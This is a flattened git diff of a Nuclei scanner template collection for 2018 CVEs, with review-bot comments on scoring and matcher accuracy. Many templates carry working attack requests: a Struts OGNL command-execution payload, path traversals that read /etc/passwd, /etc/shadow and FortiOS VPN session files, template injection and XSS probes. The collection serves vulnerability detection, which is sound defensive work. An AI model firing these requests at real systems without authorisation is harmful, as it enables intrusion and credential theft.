b/nuclei-templates/CVE-2018/CVE-2018-11709.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11709.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11709.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-11776.yaml b/nuclei-templates/CVE-2018/CVE-2018-11776.yaml deleted file mode 100644 index 9e3b7f29e4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-11776.yaml +++ /dev/null 
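Review bot: `cvss-score: 8.10` in CVE-2018-11231.yaml is written differently from the other scores in this patch (`8.1`, `8.8`, `6.1`); use `cvss-score: 8.1`. The description, "OpenCart Divido plugin is susceptible to SQL injection", names neither the affected versions nor the injection point, although the request shows it is `metadata.order_id` on the `extension/payment/divido/update` route; one sentence saying so would help triage. The path starts with `/upload/`, which presumably assumes a particular install directory, so a comment noting that installs at the web root are not probed would keep a miss from being read as a clean result.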
@@ -1,37 +0,0 @@ -id: CVE-2018-11776 - -info: - name: Apache Struts2 S2-057 - Remote Code Execution - author: pikpikcu - severity: high - description: | - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace. - reference: - - https://github.com/jas502n/St2-057 - - https://cwiki.apache.org/confluence/display/WW/S2-057 - - https://security.netapp.com/advisory/ntap-20180822-0001/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-11776 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 - cve-id: CVE-2018-11776 - cwe-id: CWE-20 - tags: cve,cve2018,apache,rce,struts,kev - -requests: - - method: GET - path: - - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/CVE-2018-11784.yaml b/nuclei-templates/CVE-2018/CVE-2018-11784.yaml deleted file mode 100644 index 65862adf48..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-11784.yaml +++ /dev/null 
@@ -1,20 +0,0 @@ -id: CVE-2018-11784 - -info: - name: Apache Tomcat Open Redirect - author: geeknik - description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. - reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E - severity: medium - tags: tomcat,redirect,cve,cve2018 - -requests: - - method: GET - path: - - "{{BaseURL}}//example.com" - - matchers: - - type: regex - regex: - - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" - part: header diff --git a/nuclei-templates/CVE-2018/cve-2018-12031.yaml b/nuclei-templates/CVE-2018/CVE-2018-12031.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12031.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12031.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12054.yaml b/nuclei-templates/CVE-2018/CVE-2018-12054.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12054.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12054.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml b/nuclei-templates/CVE-2018/CVE-2018-12300.yaml deleted file mode 100644 index 30c92b3154..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2018-12300 - -info: - name: Seagate NAS OS 4.3.15.1 - Open redirect - author: 0x_Akoko - severity: medium - description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. - reference: - - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://www.cvedetails.com/cve/CVE-2018-12300 - tags: cve,cve2018,redirect,seagate,nasos - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-12300 - cwe-id: CWE-601 - -requests: - - method: GET - - path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.example.com#' - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml b/nuclei-templates/CVE-2018/CVE-2018-12613.yaml deleted file mode 100644 index 2391066bf6..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2018-12613 - -info: - name: PhpMyAdmin <4.8.2 - Local File Inclusion - author: pikpikcu - severity: high - description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). - reference: - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 - - https://www.phpmyadmin.net/security/PMASA-2018-4/ - - https://www.exploit-db.com/exploits/44928/ - - http://web.archive.org/web/20210124181726/https://www.securityfocus.com/bid/104532/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-12613 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2018-12613 - cwe-id: CWE-287 - tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd' - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/06 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1271.yaml b/nuclei-templates/CVE-2018/CVE-2018-1271.yaml deleted file mode 100644 index 548327e206..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1271.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2018-1271 -info: - name: Spring MVC Directory Traversal Vulnerability - author: hetroublemakr - severity: medium - description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. - reference: - - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - - https://access.redhat.com/errata/RHSA-2018:1320 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2018-1271 - cwe-id: CWE-22 - tags: cve,cve2018,spring,lfi,traversal -requests: - - method: GET - path: - - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - matchers-condition: and - matchers: - - type: word - words: - - 'for 16-bit app support' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-13379.yaml b/nuclei-templates/CVE-2018/CVE-2018-13379.yaml deleted file mode 100644 index 2b87621918..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-13379.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2018-13379 - -info: - name: Fortinet FortiOS - Credentials Disclosure - author: organiccrap - severity: critical - description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). - reference: - - https://fortiguard.com/advisory/FG-IR-18-384 - - https://www.fortiguard.com/psirt/FG-IR-20-233 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-13379 - cwe-id: CWE-22 - metadata: - verified: true - shodan-query: http.html:"/remote/login" "xxxxxxxx" - tags: cve,cve2018,fortios,lfi,kev - -requests: - - method: GET - path: - - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" - - matchers: - - type: regex - part: body - regex: - - '^var fgt_lang =' -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml b/nuclei-templates/CVE-2018/CVE-2018-13980.yaml deleted file mode 100644 index c116c9f866..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2018-13980 - -info: - name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion - author: wisnupramoedya - severity: medium - description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. - reference: - - https://www.exploit-db.com/exploits/45016 - - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ - - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2018-13980 - cwe-id: CWE-22 - tags: cve,cve2018,lfi,edb,packetstorm - -requests: - - method: GET - path: - - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2018/cve-2018-14064.yaml b/nuclei-templates/CVE-2018/CVE-2018-14064.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14064.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14064.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-14574.yaml b/nuclei-templates/CVE-2018/CVE-2018-14574.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14574.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14574.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-14916.yaml b/nuclei-templates/CVE-2018/CVE-2018-14916.yaml deleted file mode 100644 index 751421b50f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-14916.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2018-14916 -info: - name: Loytec LGATE-902 Directory Traversal - author: 0x_Akoko - severity: critical - description: Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities. - reference: - - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - - https://www.cvedetails.com/cve/CVE-2018-14916 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.4 - cve-id: CVE-2018-14916 - cwe-id: CWE-732 - tags: cve,cve2018,loytec,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-14918.yaml b/nuclei-templates/CVE-2018/CVE-2018-14918.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14918.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14918.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15473.yaml b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml new file mode 100644 index 0000000000..2392e8714b --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml 
@@ -0,0 +1,29 @@
+id: CVE-2018-15473
+info:
+ name: OpenSSH Username Enumeration <= v7.7
+ author: r3dg33k,daffainfo,forgedhallpass
+ severity: medium
+ description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-15473
+ - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
+ - https://bugs.debian.org/906236
+ - http://www.openwall.com/lists/oss-security/2018/08/15/5
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2018-15473
+ cwe-id: CWE-362
+ tags: network,openssh,cve,cve2018
+network:
+ - host:
+ - "{{Hostname}}"
+ - "{{Host}}:22"
+ matchers:
+ - type: regex
+ regex:
+ - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'
+ extractors:
+ - type: regex
+ regex:
+ - '(?i)SSH-2.0-OpenSSH_[^\r]+'
diff --git a/nuclei-templates/CVE-2018/CVE-2018-15657.yaml b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml
new file mode 100644
index 0000000000..9e75ab5103
--- /dev/null
+++ b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml
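Review bot: The matcher in the `network` block decides on the SSH banner alone, so a hit means "version string at or below 7.7", not a confirmed CVE-2018-15473 exposure; distribution builds that backport the fix keep the old version string and will still be reported. I would record that in the template with a comment above `matchers:` such as `# banner-only: builds with a backported fix still match, confirm patch level before filing`, and repeat the caveat in `description`. The pattern also leaves the dot in `SSH-2.0` unescaped; `SSH-2\.0-OpenSSH_` is the stricter form for both the matcher and the extractor.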
@@ -0,0 +1,28 @@
+id: CVE-2018-15657
+info:
+ name: SureMDM Local / Remote File Inclusion
+ author: 0x_akoko
+ severity: high
+ description: SureMDM versions prior to the 2018-11 Patch suffers from local and remote file inclusion vulnerabilities.
+ reference:
+ - https://packetstormsecurity.com/files/151469/SureMDM-Local-Remote-File-Inclusion.html
+ - https://www.cvedetails.com/cve/CVE-2018-15657
+ classification:
+ cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.3
+ cve-id: CVE-2018-15657
+ cwe-id: CWE-918
+ tags: cve,cve2018,suremdm,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/DownloadUrlResponse.ashx?url=file://C:/windows/win.ini"
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
diff --git a/nuclei-templates/CVE-2018/cve-2018-15745.yaml b/nuclei-templates/CVE-2018/CVE-2018-15745.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-15745.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-15745.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-15961.yaml b/nuclei-templates/CVE-2018/CVE-2018-15961.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-15961.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-15961.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-16059.yaml b/nuclei-templates/CVE-2018/CVE-2018-16059.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-16059.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-16059.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-16133.yaml b/nuclei-templates/CVE-2018/CVE-2018-16133.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-16133.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-16133.yaml
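Review bot: The `classification` block does not agree with what the template does: the vector is `AV:L/AC:L/PR:L/UI:R` while the request is a single unauthenticated GET over the network, and `cwe-id: CWE-918` sits beside an `lfi` tag and a file-inclusion name. Triage that sorts on these fields will mis-rank a hit, so the vector and CWE should be checked against the NVD entry for CVE-2018-15657 before this is merged. `stop-at-first-match: true` has no effect with one `path` entry and can be dropped, and the word matcher has no accompanying `status` check for 200.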
diff --git a/nuclei-templates/CVE-2018/cve-2018-16167.yaml b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16167.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16167.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16288.yaml b/nuclei-templates/CVE-2018/CVE-2018-16288.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16288.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16288.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16299.yaml b/nuclei-templates/CVE-2018/CVE-2018-16299.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16299.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16299.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16341.yaml b/nuclei-templates/CVE-2018/CVE-2018-16341.yaml deleted file mode 100644 index 4e7c94456e..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-16341.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2018-16341 - -info: - name: Nuxeo <10.3 - Remote Code Execution - author: madrobot - severity: high - description: | - Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection. - classification: - cve-id: CVE-2018-16341 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-16299 - tags: cve,cve2018,nuxeo,ssti,rce,bypass - -requests: - - method: GET - path: - - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" - - matchers: - - type: word - part: body - words: - - "31333333337" - -# Enhanced by mp on 2022/06/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-16671.yaml b/nuclei-templates/CVE-2018/CVE-2018-16671.yaml deleted file mode 100644 index df6b1f3871..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-16671.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2018-16671 - -info: - name: CirCarLife SCADA Device ID - description: System software information disclosure due to lack of authentication - reference: - - https://www.exploit-db.com/exploits/45384 - author: geeknik - severity: medium - tags: cve,cve2018,circarlife,scada,iot,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/html/device-id" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "CirCarLife Scada" - - type: word - part: body - words: - - "circontrol" - - type: regex - part: body - regex: - - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" diff --git a/nuclei-templates/CVE-2018/cve-2018-17422.yaml b/nuclei-templates/CVE-2018/CVE-2018-17422.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17422.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17422.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml b/nuclei-templates/CVE-2018/CVE-2018-18069.yaml deleted file mode 100644 index 8407f914d4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: CVE-2018-18069 - -info: - name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting - author: nadino - severity: medium - description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php - request to wp-admin/admin.php. - reference: - - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-18069 - cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,plugin - -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/admin.php" - - body: | - icl_post_action=save_theme_localization&locale_file_name_en=EN"> - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'contains(tolower(all_headers), "text/html")' - - 'contains(set_cookie, "_icl_current_admin_language")' - - 'contains(body, "\">")' - condition: and - -# Enhanced by mp on 2022/04/08 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18608.yaml b/nuclei-templates/CVE-2018/CVE-2018-18608.yaml deleted file mode 100644 index c8501bfe0f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18608.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2018-18608 -info: - name: DedeCMS V5.7 - Cross Site Scripting - author: ritikchaddha - severity: medium - description: | - DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. - reference: - - https://github.com/ky-j/dedecms/issues/8 - - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 - - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-18608 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"DedeCms" - verified: "true" - tags: dedecms,xss,cve,cve2018 -requests: - - method: GET - path: - - "{{BaseURL}}/plus/feedback.php/rp4hu%27>" - - "DedeCMS Error Warning!" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18775.yaml b/nuclei-templates/CVE-2018/CVE-2018-18775.yaml deleted file mode 100644 index a6dcb26ecb..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18775.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2018-18775 - -info: - author: 0x_Akoko - description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter - name: Cross Site Scripting in Microstrategy Web version 7 - severity: medium - tags: microstrategy,xss - reference: https://www.exploit-db.com/exploits/45755 - -requests: - - method: GET - path: - - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-18777.yaml b/nuclei-templates/CVE-2018/CVE-2018-18777.yaml deleted file mode 100644 index ca48a4b0e2..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18777.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: CVE-2018-18777 - -info: - name: Path traversal vulnerability in Microstrategy Web version 7 - author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/45755 - tags: microstrategy,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml deleted file mode 100644 index 6c269ecee5..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2018-18778 -info: - name: mini_httpd Path Traversal - author: dhiyaneshDK - severity: medium - description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. - reference: - - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - - http://www.acme.com/software/mini_httpd/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2018-18778 - cwe-id: CWE-200 - tags: cve,cve2018,lfi,mini_httpd -requests: - - raw: - - |+ - GET /etc/passwd HTTP/1.1 - Host: - - unsafe: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/cve-2018-18925.yaml b/nuclei-templates/CVE-2018/CVE-2018-18925.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-18925.yaml rename to nuclei-templates/CVE-2018/CVE-2018-18925.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml deleted file mode 100644 index c689c4e74a..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml +++ /dev/null 
@@ -1,43 +0,0 @@ -id: CVE-2018-19137 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/ip-address.php. - reference: - - https://github.com/domainmod/domainmod/issues/79 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19137 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19137 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '&really_del' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19326.yaml b/nuclei-templates/CVE-2018/CVE-2018-19326.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-19326.yaml rename to nuclei-templates/CVE-2018/CVE-2018-19326.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19365.yaml b/nuclei-templates/CVE-2018/CVE-2018-19365.yaml deleted file mode 100644 index 439a9ef72c..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19365.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2018-19365 -info: - name: Wowza Streaming Engine Manager Directory Traversal - author: 0x_Akoko - severity: high - description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request - reference: - - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html - - https://www.cvedetails.com/cve/CVE-2018-19365 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-19365 - cwe-id: CWE-22 - tags: cve,cve2018,wowza,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine" - matchers-condition: and - matchers: - - type: word - words: - - "root:*:" - - "bin:*:" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19458.yaml b/nuclei-templates/CVE-2018/CVE-2018-19458.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-19458.yaml rename to nuclei-templates/CVE-2018/CVE-2018-19458.yaml diff 